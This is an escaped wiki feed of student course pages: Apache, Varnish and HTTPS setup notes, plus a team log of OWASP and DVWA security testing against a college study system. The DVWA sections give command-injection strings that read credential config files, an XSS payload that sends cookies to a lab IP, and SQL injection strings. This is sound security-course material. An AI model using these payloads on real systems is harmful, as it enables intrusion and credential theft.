Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.&lt;br /&gt;
The key fingerprint is:&lt;br /&gt;
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server&lt;br /&gt;
The key&#039;s randomart image is:&lt;br /&gt;
+--[ RSA 2048]----+&lt;br /&gt;
|            .    |&lt;br /&gt;
|           + .   |&lt;br /&gt;
|          o +    |&lt;br /&gt;
|           * o   |&lt;br /&gt;
|        S + O    |&lt;br /&gt;
|       ..+ + + . |&lt;br /&gt;
|       ...o o =  |&lt;br /&gt;
|        o+   o . |&lt;br /&gt;
|       .o.    E  |&lt;br /&gt;
+-----------------+&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Signature ok&lt;br /&gt;
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz&lt;br /&gt;
Getting Private key&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl&lt;br /&gt;
&lt;br /&gt;
Seal muuta sisu (sert, dokument root, keyfail)&lt;br /&gt;
&lt;br /&gt;
Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ServerName      www.planet.zz&lt;br /&gt;
DocumentRoot /var/www/www.planet.zz&lt;br /&gt;
SSLCertificateFile    /etc/ssl/certs/www.planet.zz.pem&lt;br /&gt;
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
a2ensite www.planet.zz-ssl&lt;br /&gt;
&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=ID kaart=&lt;br /&gt;
&lt;br /&gt;
[[ID kaardiga autentimine Apache2 veebiserveriga]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=DVWA ründed=&lt;br /&gt;
==cmd exec==&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
8.8.8.8; sed &#039;s/&amp;lt;/UUUU/&#039; ../../config/config.inc.php&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
8.8.8.8; ls -l &lt;br /&gt;
8.8.8.8; ls -l ../&lt;br /&gt;
8.8.8.8; ls -l ../../&lt;br /&gt;
#jne, kuni kõik failid/kataloogid on teada&lt;br /&gt;
8.8.8.8; sed &#039;s/&amp;lt;//&#039;  ../../../../wordpress/wp-config.php&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Loon faili kala /var/tmp kataloogi&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
8.8.8.8; touch /var/tmp/kala.txt&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ning kontrollin kas fail loodi&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
8.8.8.8; ls /var/tmp/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution&#039;it (XSS auku pole leitud, ei saa kasutada, ...)&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
; grep session.cookie_httponly /etc/php5/apache2/php.ini&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Väljund:&lt;br /&gt;
* kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;session.cookie_httponly = 1&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;session.cookie_httponly = 0&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==XSS==&lt;br /&gt;
&amp;lt;source lang=&amp;quot;javascript&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;var i=&#039;&amp;lt;img src=&amp;quot;http://192.168.56.101/&#039;+document.cookie+&#039;&amp;quot; /&amp;gt;&#039;; document.write(i);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
==veel XSSi==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
==SQLi==&lt;br /&gt;
&amp;lt;source lang=&amp;quot;sql&amp;quot;&amp;gt;&lt;br /&gt;
#blind&lt;br /&gt;
1&#039; union select BENCHMARK(100000000,ENCODE(&#039;hello&#039;,&#039;goodbye&#039;)),1; # --&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2&#039; union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
3&#039; union  select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Virtualhost_apache2_n%C3%A4itel&amp;diff=62888</id>
		<title>Virtualhost apache2 näitel</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Virtualhost_apache2_n%C3%A4itel&amp;diff=62888"/>
		<updated>2013-05-06T09:44:38Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* cmd exec */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/hosts&lt;br /&gt;
&lt;br /&gt;
192.168.56.101  www.planet.zz&lt;br /&gt;
192.168.56.101  sales.planet.zz&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ping www.planet.zz&lt;br /&gt;
&lt;br /&gt;
ping sales.planet.zz    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
apt-get update     &lt;br /&gt;
apt-get dist-upgrade&lt;br /&gt;
&lt;br /&gt;
apt-get install apache2&lt;br /&gt;
&lt;br /&gt;
mkdir -p /var/www/www.planet.zz&lt;br /&gt;
mkdir -p /var/www/sales.planet.zz&lt;br /&gt;
cp /var/www/index.html /var/www/www.planet.zz&lt;br /&gt;
cp /var/www/index.html /var/www/sales.planet.zz&lt;br /&gt;
vim /var/www/www.planet.zz/index.html&lt;br /&gt;
vim /var/www/sales.planet.zz/index.html&lt;br /&gt;
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz&lt;br /&gt;
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz&lt;br /&gt;
&lt;br /&gt;
vim www.planet.zz &lt;br /&gt;
vim sales.planet.zz &lt;br /&gt;
&lt;br /&gt;
a2ensite www.planet.zz&lt;br /&gt;
a2ensite sales.planet.zz &lt;br /&gt;
service apache2 reload&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Varnish=&lt;br /&gt;
Esmaselt tõstame apache2 porti 8080&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/apache2/ports.conf&lt;br /&gt;
NameVirtualHost *:8080&lt;br /&gt;
Listen 8080&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available&lt;br /&gt;
sed &#039;s/:80/:8080/&#039; default -i&lt;br /&gt;
sed &#039;s/:80/:8080/&#039; wp -i&lt;br /&gt;
sed &#039;s/:80/:8080/&#039; sales.planet.zz -i&lt;br /&gt;
sed &#039;s/:80/:8080/&#039; www.planet.zz -i&lt;br /&gt;
service apache2 restart&lt;br /&gt;
netstat -lntp&lt;br /&gt;
apt-get install varnish&lt;br /&gt;
vim /etc/default/varnish&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
DAEMON_OPTS=&amp;quot;-a :80 \&lt;br /&gt;
             -T localhost:6082 \&lt;br /&gt;
             -f /etc/varnish/default.vcl \&lt;br /&gt;
             -S /etc/varnish/secret \&lt;br /&gt;
             -s malloc,256m&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sub vcl_recv {&lt;br /&gt;
&lt;br /&gt;
  # Add a unique header containing the client address&lt;br /&gt;
&lt;br /&gt;
  remove req.http.X-Forwarded-For;&lt;br /&gt;
&lt;br /&gt;
  set    req.http.X-Forwarded-For = client.ip;&lt;br /&gt;
&lt;br /&gt;
  # [...]&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service varnish restart&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=DVWA ründed=&lt;br /&gt;
=HTTPS konfigureerimine=&lt;br /&gt;
&lt;br /&gt;
ssh-keygen &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Generating public/private rsa key pair.&lt;br /&gt;
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Enter passphrase (empty for no passphrase): &lt;br /&gt;
Enter same passphrase again: &lt;br /&gt;
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.&lt;br /&gt;
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.&lt;br /&gt;
The key fingerprint is:&lt;br /&gt;
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server&lt;br /&gt;
The key&#039;s randomart image is:&lt;br /&gt;
+--[ RSA 2048]----+&lt;br /&gt;
|            .    |&lt;br /&gt;
|           + .   |&lt;br /&gt;
|          o +    |&lt;br /&gt;
|           * o   |&lt;br /&gt;
|        S + O    |&lt;br /&gt;
|       ..+ + + . |&lt;br /&gt;
|       ...o o =  |&lt;br /&gt;
|        o+   o . |&lt;br /&gt;
|       .o.    E  |&lt;br /&gt;
+-----------------+&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Signature ok&lt;br /&gt;
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz&lt;br /&gt;
Getting Private key&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl&lt;br /&gt;
&lt;br /&gt;
Seal muuta sisu (sert, dokument root, keyfail)&lt;br /&gt;
&lt;br /&gt;
Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ServerName      www.planet.zz&lt;br /&gt;
DocumentRoot /var/www/www.planet.zz&lt;br /&gt;
SSLCertificateFile    /etc/ssl/certs/www.planet.zz.pem&lt;br /&gt;
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
a2ensite www.planet.zz-ssl&lt;br /&gt;
&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=ID kaart=&lt;br /&gt;
&lt;br /&gt;
[[ID kaardiga autentimine Apache2 veebiserveriga]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=DVWA ründed=&lt;br /&gt;
==cmd exec==&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
8.8.8.8; sed &#039;s/&amp;lt;/UUUU/&#039; ../../config/config.inc.php&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
8.8.8.8; ls -l &lt;br /&gt;
8.8.8.8; ls -l ../&lt;br /&gt;
8.8.8.8; ls -l ../../&lt;br /&gt;
#jne, kuni kõik failid/kataloogid on teada&lt;br /&gt;
8.8.8.8; sed &#039;s/&amp;lt;//&#039;  ../../../../wordpress/wp-config.php&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Loon faili kala /var/tmp kataloogi&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
8.8.8.8; touch /var/tmp/kala.txt&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ning kontrollin kas fail loodi&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
8.8.8.8; ls /var/tmp/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution&#039;it (XSS auku pole leitud, ei saa kasutada, ...)&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
; grep session.cookie_httponly /etc/php5/apache2/php.ini&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Väljund:&lt;br /&gt;
* kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;session.cookie_httponly = 1&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;session.cookie_httponly = 0&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==XSS==&lt;br /&gt;
&amp;lt;source lang=&amp;quot;javascript&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;var i=&#039;&amp;lt;img src=&amp;quot;http://192.168.56.101/&#039;+document.cookie+&#039;&amp;quot; /&amp;gt;&#039;; document.write(i);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
==veel XSSi==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
==SQLi==&lt;br /&gt;
&amp;lt;source lang=&amp;quot;sql&amp;quot;&amp;gt;&lt;br /&gt;
#blind&lt;br /&gt;
1&#039; union select BENCHMARK(100000000,ENCODE(&#039;hello&#039;,&#039;goodbye&#039;)),1; # --&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2&#039; union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
3&#039; union  select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62420</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62420"/>
		<updated>2013-04-05T09:04:03Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Materials (slides etc) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
